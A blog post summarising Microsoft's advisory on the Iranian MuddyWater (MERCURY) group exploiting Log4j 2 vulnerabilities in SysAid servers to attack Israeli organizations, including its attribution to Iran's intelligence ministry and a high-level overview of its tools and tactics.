Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Mercury. Show all posts

Iran Based MuddyWater Attacks Israel Companies


What is MuddyWater?

A threat actor from Iran named "Muddy Water" (called by Microsoft MERCURY) has been elevating the abuse of Log4j2 vulnerabilities in SysAid applications to attack organizations in Israel. 

Microsoft security researchers released the news advisory and said on Thursday that they analyzed (with high confidence) that MERCURY's observed operations were linked with Iran's Ministry of Intelligence and Security (MOIS). 

On July 23 and 25, 2022, MERCURY was found using exploits against a vulnerable SysAid Server as its initial access vector. According to the observations from earlier campaigns and flaws found in victim environments, the researchers have assessed that the exploits used were most probably related to Log4j.2. 

Microsoft links attack to Iranian Hackers

Microsoft said it assesses with moderate confidence that MERCURY exploited remote code execution vulnerabilities in Apache Log4j 2 (also referred to as “Log4Shell”) in vulnerable SysAid Server instances the targets were running. MERCURY has used Log4j 2 exploits in past campaigns as well. 

MSTIC assesses with high confidence that MERCURY is coordinating its operations in affiliation with Iran’s Ministry of Intelligence and Security (MOIS). According to the US Cyber Command, MuddyWater, a group we track as MERCURY, “is a subordinate element within the Iranian Ministry of Intelligence and Security.”

As a matter of fact, the novel campaign found by Microsoft Threat Intelligence Center (MSTIC) and Microsoft 365 Defender Research Team is different from earlier MERCURY variants as it is the only one in which the group exploits SysAid apps as a vector for earlier access. 

How does Mercury work?

Once MERCURY has gained access, it creates persistence, dumps credentials, and travels laterally within the victim organization via custom and popular hacking tools and built-in operating system tools for its hands-on-keyboard attacks. 

Microsoft has also added a list of common techniques and tooling used by MERCURY, these include spearphishing, along with programs like Venom proxy tool, the Ligolo reverse tunneling technique, and home-grown PowerShell programs. 

What next?

Microsoft confirmed that it informed customers that have been hit or targeted, giving them the info required to protect their accounts. Microsoft has also given a list of indicators of compromise (IOCs) linked to MERCURY's activity. 

Microsoft isn't the first company that has linked MERCURY with Iranian state actors. At the beginning of this year, both U.K. and U.S. governments released warnings linking the group with the state's MOIS. 

"We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems," said Microsoft.